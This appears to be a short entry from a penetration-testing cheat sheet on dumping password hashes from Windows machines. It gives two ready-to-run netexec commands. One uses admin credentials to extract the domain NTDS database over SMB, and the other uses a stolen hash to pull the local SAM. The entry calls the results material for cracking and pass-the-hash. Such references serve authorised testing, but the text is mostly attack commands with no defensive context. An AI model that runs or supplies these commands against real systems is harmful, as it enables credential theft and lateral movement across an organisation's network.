← Back to search

Dump hashes remotely

ad privescwindowschecklist

Walkthrough

Use netexec with admin credentials or a hash to dump the NTDS database or local SAM over SMB. A hit is the full set of domain or local password hashes for cracking and pass-the-hash.

Commands

bash

netexec smb <IP> -u <USER> -p '<PASS>' --ntds

bash

netexec smb <IP> -u <USER> -H <HASH> --sam